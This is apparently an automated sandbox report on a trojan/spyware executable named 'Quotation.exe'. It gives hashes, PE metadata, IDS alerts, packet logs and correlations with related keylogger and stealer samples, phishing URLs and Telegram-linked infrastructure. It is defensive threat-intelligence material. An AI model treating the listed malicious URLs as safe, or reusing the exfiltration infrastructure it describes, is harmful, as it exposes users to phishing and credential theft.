                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1527820
                              Start date and time:2024-10-07 10:12:09 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 47s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Quotation.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.winEXE@1/0@4/4
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 66
                              • Number of non-executed functions: 8
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              TimeTypeDescription
                              04:13:29API Interceptor9002018x Sleep call for process: Quotation.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              149.154.167.220sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                      YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                        qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                          SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                            Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                  188.114.96.3http://revexhibition.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                  • revexhibition.pages.dev/favicon.ico
                                                  http://meta.case-page-appeal.eu/community-standard/112225492204863/Get hashmaliciousUnknownBrowse
                                                  • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                  http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
                                                  • www.tkmall-wholesale.com/
                                                  c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                                  • winfileshare.com/ticket_line/llb.php
                                                  QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                  • filetransfer.io/data-package/eZFzMENr/download
                                                  QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                  • filetransfer.io/data-package/eZFzMENr/download
                                                  1tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                  • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                  http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                  • asm.alcateia.org/
                                                  hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                  • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                                                  z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • www.bayarcepat19.click/g48c/
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  reallyfreegeoip.orgsam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                  • 188.114.96.3
                                                  ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3
                                                  2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3
                                                  VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                  • 188.114.97.3
                                                  na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3
                                                  INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3
                                                  Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3
                                                  checkip.dyndns.comsam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                  • 158.101.44.242
                                                  ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 193.122.6.168
                                                  2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 132.226.247.73
                                                  jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 132.226.247.73
                                                  na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                  • 193.122.6.168
                                                  na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                  • 132.226.8.169
                                                  Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 193.122.130.0
                                                  mail.electradubai.comz64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 192.250.231.25
                                                  api.telegram.orgsam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                  • 149.154.167.220
                                                  ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                  • 149.154.167.220
                                                  YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                                  • 149.154.167.220
                                                  qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                  • 149.154.167.220
                                                  SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                                  • 149.154.167.220
                                                  Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                  • 149.154.167.220
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  TELEGRAMRUsam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                  • 149.154.167.220
                                                  ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 149.154.167.220
                                                  zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                  • 149.154.167.99
                                                  e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                  • 149.154.167.220
                                                  YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                                  • 149.154.167.220
                                                  qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                  • 149.154.167.220
                                                  https://floral-heart-eeff.3p3ka4x.workers.dev/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.99
                                                  https://sexyboobsme.pages.dev/Get hashmaliciousPorn ScamBrowse
                                                  • 149.154.167.99
                                                  https://telegrambotfix.pages.dev/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.99
                                                  CNSV-LLCUSz64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 192.250.231.25
                                                  F#U0130YAT TEKL#U0130F#U0130-2400.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 192.250.227.28
                                                  https://sesworld.com.au:443/it/mount/Get hashmaliciousUnknownBrowse
                                                  • 192.250.235.25
                                                  https://hmchive.com/?hcv=bGFldGl0aWEucGF0cnktYmFsYXRAc3VlZHp1Y2tlcmdyb3VwLmNvbS0tLS1DYXJsb3MgR2FpdMOhbg==Get hashmaliciousUnknownBrowse
                                                  • 192.250.227.21
                                                  z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                  • 192.250.231.28
                                                  https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                  • 192.250.227.23
                                                  https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
                                                  • 192.250.227.23
                                                  http://linkplea.se/doarGet hashmaliciousUnknownBrowse
                                                  • 192.250.229.80
                                                  rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                  • 192.250.234.170
                                                  https://kanomama.com/KFKFLDRFKLEK?///RG9tYWluXFVzZXJuYW1lQGRvbWFpbi5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                  • 192.250.229.40
                                                  CLOUDFLARENETUShttps://pub-40cb77b4a6d84294bfa2db6a96f70ff7.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.25.14
                                                  https://pub-21e2ca3bca8444aab694f2d286d3f97f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.25.14
                                                  https://pub-2fd40031391d4470a8c3c1090493deca.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.25.14
                                                  https://pub-0b1b4754e32d4359b9a318e8133d30bc.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.25.14
                                                  https://pub-53d8c8824459455a8bb62d4b9a0d5f2f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 172.66.0.235
                                                  https://pub-737d748721344356b3ba725600a8404d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.25.14
                                                  http://patjimmy323.wixsite.com/my-site-1/Get hashmaliciousHTMLPhisherBrowse
                                                  • 162.159.140.229
                                                  http://ikergalindez.github.io/gofish/Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.21.235.213
                                                  https://coisunibaseaiusignin.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.16.117.116
                                                  Farahexperiences.com_Report_87018.pdfGet hashmaliciousUnknownBrowse
                                                  • 104.17.25.14
                                                  UTMEMUS2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 132.226.247.73
                                                  jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 132.226.247.73
                                                  na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                  • 132.226.8.169
                                                  Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  INVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  Confirmation transfer AGS # 03-10-24.scr.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  • 132.226.8.169
                                                  Urgent inquiry for quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  Payment Advice - Advice Ref pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  Ziraat Bankasi Swift Mesaji_20241003_3999382.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 132.226.247.73
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  54328bd36c14bd82ddaa0c04b25ed9adsam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                  • 188.114.96.3
                                                  ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3
                                                  2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3
                                                  VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                  • 188.114.96.3
                                                  na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  Winscreen.exeGet hashmaliciousXmrigBrowse
                                                  • 188.114.96.3
                                                  Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 188.114.96.3
                                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://pub-0b1b4754e32d4359b9a318e8133d30bc.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  https://coisunibaseaiusignin.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  http://pub-51f896deb233450089fc1a520e6ed957.r2.dev/kanehods.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  http://geminislogins.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  http://pub-2801359d2be54bfd8701132626efeb73.r2.dev/owoed.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 149.154.167.220
                                                  http://jamesfortune619.wixsite.com/my-site-4/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  http://cp-wc32.syd02.ds.network/~melbou28/cgi.bin/fr/d7f1d/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  OTO2wVGgkl.exeGet hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  http://pub-21beea42d44e4f0e83b5336b9ac3900a.r2.dev/woosf.htmlGet hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  http://advertising-copyright-review.d2taqiqjh5pjw0.amplifyapp.com/Get hashmaliciousUnknownBrowse
                                                  • 149.154.167.220
                                                  No context
                                                  No created / dropped files found
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):5.6348501028935125
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                  File name:Quotation.exe
                                                  File size:276'992 bytes
                                                  MD5:f485d8c73bcc8ac6ab3f432f2258d030
                                                  SHA1:7f990d4304126a8d731b0b5a99be8a5dad0d0090
                                                  SHA256:7f285582f0f5bcda85cbc485d3e29ff0cc0693f68a6d2be98fac0866b1524f67
                                                  SHA512:3a24a8bc8d554bb653e77906976a418126595c256397a756d6093871b0ff761b0600b0f3039a5c8a7dcb8b4845a7274743b7213e0283c1d82ad3d04396c11872
                                                  SSDEEP:3072:jWAT5ctg+Orw0aqqb5mlXYOE6jc7dz0pHuchXtQabfiZEsoAUYTVg4i9bbY:A6fh9QabK4b
                                                  TLSH:384484092FE8A801D6FF8877C2B64125C6BAF46306698D3E16D1F81A3E3D541DE46F63
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............P..$..........^C... ...`....@.. ....................................@................................
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x44435e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x669085D9 [Fri Jul 12 01:24:41 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x4430c0x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x1017.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x423640x424006fab44069e4d05de67e9e417ce540ba7False0.2140072228773585data5.636622019462957IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x460000x10170x120078b97a769c57cf460625c961b04b1a16False0.3543836805555556data4.76801789588623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x480000xc0x200a8f749137ef27fb0cd402a54552ebf75False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0x460a00x31cdata0.4271356783919598
                                                  RT_MANIFEST0x463bc0xc5bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3926651912741069
                                                  DLLImport
                                                  mscoree.dll_CorExeMain
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-10-07T10:13:29.091145+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849704132.226.247.7380TCP
                                                  2024-10-07T10:13:30.888015+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849704132.226.247.7380TCP
                                                  2024-10-07T10:13:31.432429+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849706188.114.96.3443TCP
                                                  2024-10-07T10:13:32.154035+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849707132.226.247.7380TCP
                                                  2024-10-07T10:13:33.450514+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849709132.226.247.7380TCP
                                                  2024-10-07T10:13:34.825502+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711132.226.247.7380TCP
                                                  2024-10-07T10:13:35.384647+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849712188.114.96.3443TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 7, 2024 10:13:28.010461092 CEST4970480192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:28.015269041 CEST8049704132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:28.015414953 CEST4970480192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:28.015691996 CEST4970480192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:28.020483971 CEST8049704132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:28.708383083 CEST8049704132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:28.763062000 CEST4970480192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:28.796660900 CEST4970480192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:28.801557064 CEST8049704132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:29.041935921 CEST8049704132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:29.091145039 CEST4970480192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:29.787615061 CEST49705443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:29.787653923 CEST44349705188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:29.787724018 CEST49705443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:29.921655893 CEST49705443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:29.921677113 CEST44349705188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:30.392541885 CEST44349705188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:30.392715931 CEST49705443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:30.398111105 CEST49705443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:30.398121119 CEST44349705188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:30.398416042 CEST44349705188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:30.450481892 CEST49705443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:30.451227903 CEST49705443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:30.491413116 CEST44349705188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:30.558051109 CEST44349705188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:30.558140039 CEST44349705188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:30.558226109 CEST49705443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:30.619772911 CEST49705443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:30.623306036 CEST4970480192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:30.628056049 CEST8049704132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:30.833537102 CEST8049704132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:30.835681915 CEST49706443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:30.835711002 CEST44349706188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:30.835809946 CEST49706443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:30.836204052 CEST49706443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:30.836215019 CEST44349706188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:30.888015032 CEST4970480192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:31.299746037 CEST44349706188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:31.302071095 CEST49706443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:31.302086115 CEST44349706188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:31.432430029 CEST44349706188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:31.432549953 CEST44349706188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:31.432601929 CEST49706443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:31.433049917 CEST49706443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:31.436579943 CEST4970480192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:31.437977076 CEST4970780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:31.441741943 CEST8049704132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:31.442373037 CEST4970480192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:31.442864895 CEST8049707132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:31.443406105 CEST4970780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:31.443406105 CEST4970780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:31.448365927 CEST8049707132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:32.110574007 CEST8049707132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:32.112097979 CEST49708443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:32.112138033 CEST44349708188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:32.112229109 CEST49708443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:32.112468004 CEST49708443192.168.2.8188.114.96.3
